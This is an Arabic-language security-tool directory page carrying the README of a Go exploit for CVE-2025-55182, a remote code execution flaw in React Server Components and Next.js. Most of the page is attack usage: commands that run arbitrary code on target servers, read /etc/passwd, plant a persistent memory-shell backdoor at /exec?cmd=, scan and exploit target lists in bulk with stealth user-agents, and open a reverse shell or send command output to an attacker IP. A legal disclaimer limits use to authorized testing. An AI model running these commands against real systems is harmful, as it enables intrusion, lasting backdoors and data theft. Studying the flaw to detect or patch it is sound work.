Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-golang-PoC — إثبات مفهوم قائم على Go لثغرة CVE-2025-55182، وهي ثغرة RCE حرجة في React Server Components. يتضمن فحص الثغرات، وتنفيذ الأوامر، وحقن ذاكرة شيل، وروابط عكسية، وفحص دفعات، ودعم وكيل للاختبار الأمني المصرح به. | Kitploit
أدوات/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

إثبات مفهوم قائم على Go لثغرة CVE-2025-55182، وهي ثغرة RCE حرجة في React Server Components. يتضمن فحص الثغرات، وتنفيذ الأوامر، وحقن ذاكرة شيل، وروابط عكسية، وفحص دفعات، ودعم وكيل للاختبار الأمني المصرح به.

عرض المستودعالموقع الإلكتروني
611منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 ثغرة تنفيذ الأوامر عن بُعد في مكونات خادم React - إثبات المفهوم بلغة Go

⚠️ للاستخدام المصرّح به في اختبار الأمان فقط ⚠️

الوصف

CVE-2025-55182 (المعروف أيضًا باسم CVE-2025-66478) هي ثغرة حرجة في تنفيذ الأوامر عن بُعد (RCE) في مكونات خادم React (بروتوكول Flight). هذه الأداة هي تنفيذ بلغة Go لإثبات المفهوم لأغراض البحث الأمني واختبار الاختراق المصرّح به.

الإصدارات المتأثرة:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (قبل التصحيحات: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (قبل 16.0.7)
  • Next.js: 14.3.0-canary.77 والإصدارات التجريبية الأحدث

تفاصيل الثغرة

يستغل الاستغلال تلوث النموذج الأولي (prototype pollution) في عملية إلغاء تسلسل بروتوكول Flight:

  1. يستخدم إلغاء التسلسل $@ للحصول على مرجع Chunk
  2. يضع Chunk.prototype.then كخاصية then للكائن الجذر
  3. يضبط الحالة على RESOLVED_MODEL لاستدعاء مع قطعة وهمية خاضعة للتحكم
initializeModelChunk
  • يحفّز إلغاء تسلسل Blob الذي يستدعي response._formData.get بحمولة المهاجم
  • يضبط response._formData.get على دالة المُنشئ (Function constructor) لتنفيذ تعليمات برمجية عشوائية
  • الميزات

    • قدرة كاملة على تنفيذ الأوامر عن بُعد - تنفيذ أوامر عشوائية مع عرض المخرجات
    • وضع التحقق من الثغرة - كشف آمن دون استغلال
    • كشف إصدار Next.js - بصمة إصدار تلقائية
    • حقن شل ذاكرة (Memory Shell) - باب خلفي دائم في /exec?cmd=
    • فحص دفعاتي - فحص متعدد الخيوط مع مخرجات JSON
    • دعم وكيل شامل:
      • SOCKS5 مع/بدون مصادقة
      • SOCKS4/SOCKS4a
      • وكيل HTTP/HTTPS مع/بدون مصادقة
    • وضع التخفي - وكيل-مستخدم للمتصفح، الزاحف، الأمان
    • تحديد معدل الطلبات - تأخير قابل للتكوين بين الطلبات
    • شل عكسي - mkfifo + nc (يعمل على Alpine/busybox)
    • تسريب البيانات - إرسال مخرجات الأوامر عبر POST إلى خادم المهاجم
    • بنية متعددة المنصات - أكثر من 30 مجموعة نظام/معمارية
    • مخرجات JSON - نتائج قابلة للقراءة آلية للأتمتة

    التثبيت

    الملفات الثنائية المُجمّعة مسبقًا

    قم بتنزيل أحدث إصدار لمنصتك من إصدارات GitHub.

    الملفات الثنائية المتاحة:

    • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
    • Windows: amd64, 386, arm64
    • macOS: amd64 (Intel), arm64 (Apple Silicon)
    • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
    • والمزيد...

    من المصدر

    root@kitploit:~
    # استنساخ المستودع
    git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
    cd CVE-2025-55182-golang-PoC
    
    # بناء للمنصة الحالية
    go build -o cve-2025-55182 .
    
    # أو بناء لجميع المنصات
    chmod +x build.sh
    ./build.sh
    

    بناء من المصدر

    بعد تشغيل ./build.sh، ستتوفر الملفات الثنائية في المجلد build/ لجميع المنصات المدعومة.

    الاستخدام

    الأوامر الأساسية

    root@kitploit:~
    # التحقق من ثغرة على هدف واحد
    ./cve-2025-55182 -u http://target:3000 --check
    
    # كشف إصدار Next.js
    ./cve-2025-55182 -u http://target:3000 --version-check
    
    # تنفيذ أمر مع عرض المخرجات
    ./cve-2025-55182 -u http://target:3000 -c "id"
    ./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"
    

    شل الذاكرة (باب خلفي دائم)

    root@kitploit:~
    # حقن شل الذاكرة (يتحقق أولاً مما إذا كان مثبتًا بالفعل)
    ./cve-2025-55182 -u http://target:3000 --memshell
    
    # اختبار ما إذا كانت شل الذاكرة نشطة
    ./cve-2025-55182 -u http://target:3000 --test-shell
    
    # تنفيذ أمر عبر شل الذاكرة
    ./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"
    
    # بعد الحقن، يمكنك أيضًا استخدام curl مباشرة:
    curl 'http://target:3000/exec?cmd=id'
    curl 'http://target:3000/exec?cmd=whoami'
    

    ترويسات مخصصة وتجاوز SSL

    root@kitploit:~
    # إضافة ترويسات مخصصة (يمكن استخدامها عدة مرات)
    ./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
    ./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'
    
    # تخطي التحقق من شهادة SSL (للشهادات الذاتية التوقيع)
    ./cve-2025-55182 -u https://target:3000 --check -k
    ./cve-2025-55182 -u https://target:3000 --check --insecure
    
    # الدمج مع خيارات أخرى
    ./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080
    

    دعم الوكيل

    root@kitploit:~
    # SOCKS5 مع مصادقة
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080
    
    # SOCKS5 بدون مصادقة
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080
    
    # وكيل SOCKS4
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080
    
    # وكيل HTTP
    ./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080
    

    الفحص الدفعي

    root@kitploit:~
    # فحص دفعاتي من ملف
    ./cve-2025-55182 --urls targets.txt --check
    
    # فحص دفعاتي مع مخرجات JSON
    ./cve-2025-55182 --urls targets.txt --check --json -o results.json
    
    # فحص دفعاتي مع عدة خيوط وتخفي
    ./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s
    
    # حفظ الأهداف الضعيفة في ملف
    ./cve-2025-55182 -f targets.txt --check -o vulnerable.txt
    
    # حقن شل ذاكرة دفعاتي
    ./cve-2025-55182 --urls targets.txt --memshell --workers 10
    
    # تنفيذ أوامر دفعاتي
    ./cve-2025-55182 --urls targets.txt -c "id" --threads 5
    

    تسريب البيانات عبر الشبكة

    root@kitploit:~
    # شل عكسي (mkfifo + nc، يعمل على Alpine)
    ./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444
    
    # بدء المستمع على جهاز المهاجم أولاً:
    nc -lvnp 4444
    
    # تسريب مخرجات الأوامر عبر HTTP POST
    ./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
    
    # بدء المستمع: nc -lvnp 4444
    

    الخيارات

    الخيارالوصف
    -u, --urlعنوان URL الهدف (مثل http://localhost:3000)
    -f, --fileملف يحتوي على عناوين URL الهدف (واحد لكل سطر)
    --urlsاسم مستعار لـ -f/--file
    -o, --outputملف الإخراج للأهداف الضعيفة
    --jsonإخراج النتائج بتنسيق JSON
    -c, --commandالأمر المراد تنفيذه (مع المخرجات)
    --checkالتحقق من وجود الثغرة
    --version-checkكشف إصدار Next.js
    --proxyعنوان URL للوكيل (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
    -H, --headerترويسة مخصصة (يمكن استخدامها عدة مرات)
    -k, --insecureتخطي التحقق من شهادة SSL/TLS
    --stealthوضع التخفي: browser، crawler، security (الافتراضي: browser)
    --delayالتأخير بين الطلبات (مثل 2s، 500ms)
    --variantsاستخدام متغيرات حمولة متعددة للفحص الشامل
    --memshellحقن شل الذاكرة (باب خلفي دائم)
    --test-shellاختبار ما إذا كانت شل الذاكرة نشطة
    --shell-execتنفيذ أمر عبر شل الذاكرة
    --revshell IP PORTإنشاء شل عكسي
    --exfil CMD IP PORTتنفيذ أمر وإرسال المخرجات عبر POST
    -t, --timeoutمهلة الطلب بالثواني (الافتراضي: 15)
    --threadsعدد الخيوط المتزامنة (الافتراضي: 10)
    --workersاسم مستعار لـ --threads

    أنواع الوكيل

    root@kitploit:~
    socks5://user:pass@ip:port  - SOCKS5 مع مصادقة
    socks5://ip:port            - SOCKS5 بدون مصادقة  
    socks5h://ip:port           - SOCKS5 مع حل أسماء نطاقات عن بُعد
    socks4://ip:port            - وكيل SOCKS4
    socks4a://ip:port           - وكيل SOCKS4a
    http://user:pass@ip:port    - وكيل HTTP مع مصادقة
    http://ip:port              - وكيل HTTP بدون مصادقة
    https://ip:port             - وكيل HTTPS
    

    أوضاع التخفي

    الوضعالوصف
    browserيحاكي طلبات المتصفح الحقيقية (Chrome، Firefox، Safari، Edge) - الافتراضي
    crawlerيحاكي زاحفي محركات البحث (Googlebot، Bingbot، Baiduspider، إلخ)
    securityيستخدم وكيل-مستخدم ماسحات الأمان (Nessus، Nuclei)

    شل الذاكرة

    ميزة شل الذاكرة تحقن بابًا خلفيًا دائمًا يقوم بما يلي:

    1. يتحقق أولاً - قبل الحقن، يتحقق مما إذا كانت الشل مثبتة بالفعل
    2. يعلق http.Server.prototype.emit - يعترض جميع طلبات HTTP
    3. ينشئ نقطة نهاية /exec - يقبل معامل الاستعلام cmd
    4. يبقى حتى إعادة التشغيل - يستمر في ذاكرة الخادم
    root@kitploit:~
    # بعد الحقن:
    curl 'http://target:3000/exec?cmd=id'
    curl 'http://target:3000/exec?cmd=ls+-la'
    curl 'http://target:3000/exec?cmd=cat+/etc/passwd'
    

    هيكل المشروع

    root@kitploit:~
    .
    ├── main.go                   # نقطة دخول CLI
    ├── pkg/
    │   ├── colors/
    │   │   └── colors.go         # ألوان الطرفية مع دعم --nocolor
    │   ├── exploit/
    │   │   └── exploit.go        # منطق الاستغلال الأساسي، شل الذاكرة، كشف الإصدار
    │   ├── proxy/
    │   │   └── proxy.go          # دعم وكيل SOCKS4/5، HTTP
    │   ├── scanner/
    │   │   └── scanner.go        # الفحص الدفعي مع مخرجات JSON
    │   └── stealth/
    │       └── stealth.go        # توزيع عشوائي لوكيل-المستخدم
    ├── build.sh                  # سكريبت البناء عبر المنصات
    ├── go.mod                    # ملف وحدة Go
    ├── go.sum                    # تبعيات Go
    └── README.md                 # هذا الملف
    

    بنية عبر المنصات

    سكريبت build.sh يبني لأكثر من 30 منصة:

    • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
    • Windows: amd64, 386, arm64 (.exe)
    • macOS: amd64 (Intel), arm64 (Apple Silicon)
    • FreeBSD: amd64, 386, arm, arm64
    • OpenBSD: amd64, 386, arm, arm64
    • NetBSD: amd64, 386, arm, arm64
    • DragonFly BSD: amd64
    • Solaris/Illumos: amd64
    • Plan 9: amd64, 386
    • AIX: ppc64
    root@kitploit:~
    chmod +x build.sh
    ./build.sh
    

    تنسيق إخراج JSON

    عند استخدام علامة --json، يتم حفظ النتائج بتنسيق JSONL (جسون واحد لكل سطر):

    root@kitploit:~
    {"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}
    

    التقرير الكامل (_report.json) يتضمن:

    root@kitploit:~
    {
      "scan_time": "2025-12-06T12:00:00Z",
      "total_urls": 100,
      "vulnerable_count": 5,
      "safe_count": 90,
      "timeout_count": 5,
      "results": [...]
    }
    

    كشف الإصدار

    يمكن للأداة كشف إصدار Next.js من:

    • الترويسة X-Powered-By
    • مصدر HTML/JS (__NEXT_DATA__، المسارات /_next/)
    • أنماط بيان البناء

    يتم تمييز الإصدارات الضعيفة باللون الأحمر.

    إخلاء المسؤولية

    ⚠️ إشعار قانوني هام ⚠️

    هذه الأداة مُقدمة بشكل صارم للأغراض التعليمية واختبار الأمان المصرّح به فقط.

    الاستخدام المقصود

    • البحث الأمني وتقييم الثغرات
    • اختبار الاختراق المصرح به بإذن كتابي
    • اختبار تطبيقاتك وبنيتك التحتية الخاصة
    • العرض التوضيحي التعليمي في بيئات مختبرية خاضعة للتحكم
    • تطوير التصحيحات وتدابير الأمان

    الاستخدام المحظور

    يُمنع منعًا باتًا استخدام هذه الأداة:

    • ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها
    • لأي أنشطة ضارة أو غير قانونية أو غير مصرح بها
    • للوصول غير المصرح به إلى أنظمة الحاسوب أو الشبكات
    • بما يخالف أي قوانين محلية أو حكومية أو وطنية أو دولية سارية
    • لتعطيل أو إتلاف أو اختراق الأنظمة دون إذن

    تحذير قانوني

    الوصول غير المصرح به إلى أنظمة الحاسوب هو جريمة جنائية في معظم الدول حول العالم، بما في ذلك على سبيل المثال لا الحصر:

    • 🇺🇸 الولايات المتحدة: قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) - عقوبة تصل إلى 20 عامًا في السجن
    • 🇪🇺 الاتحاد الأوروبي: التوجيه 2013/40/EU بشأن الهجمات على أنظمة المعلومات
    • 🇷🇺 روسيا: المادة 272-274 من القانون الجنائي
    • 🇬🇧 المملكة المتحدة: قانون إساءة استخدام الحاسوب 1990
    • 🇩🇪 ألمانيا: §202a-202d StGB
    • 🇨🇳 الصين: المواد 285-287 من القانون الجنائي

    لا ضمان

    هذا البرنامج يُقدم "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني. لا يتحمل المؤلفون أو حاملو حقوق الطبع أي مسؤولية عن أي مطالبات أو أضرار أو مسؤوليات أخرى ناشئة عن استخدام هذا البرنامج.

    مسؤولية المستخدم

    بتحميل أو تثبيت أو استخدام هذه الأداة، فإنك تقر بما يلي:

    1. أنت المسؤول الوحيد عن أفعالك
    2. ستستخدم هذه الأداة فقط على أنظمة تملكها أو لديك إذن صريح لاختبارها
    3. أنت تفهم وتقبل جميع المخاطر المرتبطة باستخدام هذا البرنامج
    4. لا يتحمل المؤلف أي مسؤولية عن أي سوء استخدام أو ضرر يحدث

    إذا كنت لا توافق على هذه الشروط، فلا تستخدم هذه الأداة.

    المؤلف

    Vladislav Tislenko aka keklick1337
    التاريخ: 2025-12-05

    الترخيص

    هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.


    استخدم بمسؤولية. ابق قانونيًا. 🔐

    تنزيل الأداة
    --nocolorتعطيل الإخراج الملون (لنظام Windows/الأنابيب)
    -h, --helpعرض رسالة المساعدة
    -v, --versionعرض الإصدار